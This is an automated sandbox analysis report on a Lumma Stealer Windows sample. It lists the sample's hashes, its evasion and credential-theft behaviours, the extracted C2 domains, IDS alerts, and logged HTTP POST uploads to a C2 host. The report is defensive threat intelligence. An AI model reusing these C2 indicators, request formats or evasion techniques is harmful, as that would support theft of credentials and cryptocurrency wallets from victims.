Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zhQFKte2vX.exe

Overview

General Information

Sample name:zhQFKte2vX.exe
renamed because original name is a hash value
Original sample name:157a5af38553ccb117f6d278b2b046f0.exe
Analysis ID:1578956
MD5:157a5af38553ccb117f6d278b2b046f0
SHA1:9793935e64772bb6fa3665d090fb7e9d448ad438
SHA256:a0d75064673f21a234d5556762f77ee96daad893e015824d7526cb965df0dd44
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • zhQFKte2vX.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\zhQFKte2vX.exe" MD5: 157A5AF38553CCB117F6D278B2B046F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rapeflowwj.lat", "discokeyus.lat", "grannyejh.lat", "sweepyribs.lat", "energyaffai.lat", "necklacebudi.lat", "sustainskelet.lat", "aspecteirs.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: zhQFKte2vX.exe PID: 4208JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: zhQFKte2vX.exe PID: 4208JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: zhQFKte2vX.exe PID: 4208JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:36.797002+010020283713Unknown Traffic192.168.2.749704172.67.197.170443TCP
              2024-12-20T17:05:41.982787+010020283713Unknown Traffic192.168.2.749705172.67.197.170443TCP
              2024-12-20T17:05:44.690217+010020283713Unknown Traffic192.168.2.749706172.67.197.170443TCP
              2024-12-20T17:05:47.219346+010020283713Unknown Traffic192.168.2.749707172.67.197.170443TCP
              2024-12-20T17:05:49.655708+010020283713Unknown Traffic192.168.2.749709172.67.197.170443TCP
              2024-12-20T17:05:53.248920+010020283713Unknown Traffic192.168.2.749712172.67.197.170443TCP
              2024-12-20T17:05:56.652841+010020283713Unknown Traffic192.168.2.749713172.67.197.170443TCP
              2024-12-20T17:06:03.121052+010020283713Unknown Traffic192.168.2.749714172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:40.756321+010020546531A Network Trojan was detected192.168.2.749704172.67.197.170443TCP
              2024-12-20T17:05:42.845349+010020546531A Network Trojan was detected192.168.2.749705172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:40.756321+010020498361A Network Trojan was detected192.168.2.749704172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:42.845349+010020498121A Network Trojan was detected192.168.2.749705172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:36.797002+010020583611Domain Observed Used for C2 Detected192.168.2.749704172.67.197.170443TCP
              2024-12-20T17:05:41.982787+010020583611Domain Observed Used for C2 Detected192.168.2.749705172.67.197.170443TCP
              2024-12-20T17:05:44.690217+010020583611Domain Observed Used for C2 Detected192.168.2.749706172.67.197.170443TCP
              2024-12-20T17:05:47.219346+010020583611Domain Observed Used for C2 Detected192.168.2.749707172.67.197.170443TCP
              2024-12-20T17:05:49.655708+010020583611Domain Observed Used for C2 Detected192.168.2.749709172.67.197.170443TCP
              2024-12-20T17:05:53.248920+010020583611Domain Observed Used for C2 Detected192.168.2.749712172.67.197.170443TCP
              2024-12-20T17:05:56.652841+010020583611Domain Observed Used for C2 Detected192.168.2.749713172.67.197.170443TCP
              2024-12-20T17:06:03.121052+010020583611Domain Observed Used for C2 Detected192.168.2.749714172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:35.428603+010020583601Domain Observed Used for C2 Detected192.168.2.7636181.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:35.285027+010020583641Domain Observed Used for C2 Detected192.168.2.7597591.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:35.140726+010020583781Domain Observed Used for C2 Detected192.168.2.7507061.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:05:48.188607+010020480941Malware Command and Control Activity Detected192.168.2.749707172.67.197.170443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: zhQFKte2vX.exeAvira: detected
              Found malware configuration
              Source: zhQFKte2vX.exe.4208.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "discokeyus.lat", "grannyejh.lat", "sweepyribs.lat", "energyaffai.lat", "necklacebudi.lat", "sustainskelet.lat", "aspecteirs.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}
              Multi AV Scanner detection for submitted file
              Source: zhQFKte2vX.exeReversingLabs: Detection: 65%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: zhQFKte2vX.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sweepyribs.lat
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
              Source: zhQFKte2vX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49713 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.7:50706 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.7:63618 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49705 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49709 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49704 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49714 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49712 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49707 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.7:59759 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49706 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49713 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49707 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49705 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 172.67.197.170:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: rapeflowwj.lat
              Source: Malware configuration extractorURLs: discokeyus.lat
              Source: Malware configuration extractorURLs: grannyejh.lat
              Source: Malware configuration extractorURLs: sweepyribs.lat
              Source: Malware configuration extractorURLs: energyaffai.lat
              Source: Malware configuration extractorURLs: necklacebudi.lat
              Source: Malware configuration extractorURLs: sustainskelet.lat
              Source: Malware configuration extractorURLs: aspecteirs.lat
              Source: Malware configuration extractorURLs: crosshuaht.lat
              Source: Joe Sandbox ViewIP Address: 172.67.197.170 172.67.197.170
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49712 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49707 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 172.67.197.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49713 -> 172.67.197.170:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5QXR01HVP5LF9RR6L2BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12850Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SJYCOTWQ7D4WOJWAAFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ERVH1N0HJQ8CFIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20377Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z384R315DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1171Host: discokeyus.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V2B0YK8QWEUATUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551360Host: discokeyus.lat
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
              Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668518553.000000000122A000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549507523.0000000001200000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
              Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: zhQFKte2vX.exe, 00000000.00000002.1751816178.0000000001248000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1600764819.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1577738740.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1602483540.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
              Source: zhQFKte2vX.exe, 00000000.00000002.1751816178.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/%
              Source: zhQFKte2vX.exe, 00000000.00000003.1634959757.0000000005B21000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634272116.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634918161.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1635272456.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634525610.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634806498.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/&
              Source: zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
              Source: zhQFKte2vX.exe, 00000000.00000002.1753601900.0000000005B2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api0
              Source: zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apia
              Source: zhQFKte2vX.exe, 00000000.00000003.1637662303.0000000001259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apirS
              Source: zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
              Source: zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apiLocal
              Source: zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apifu7wner3.default-release/key4.dbPK
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
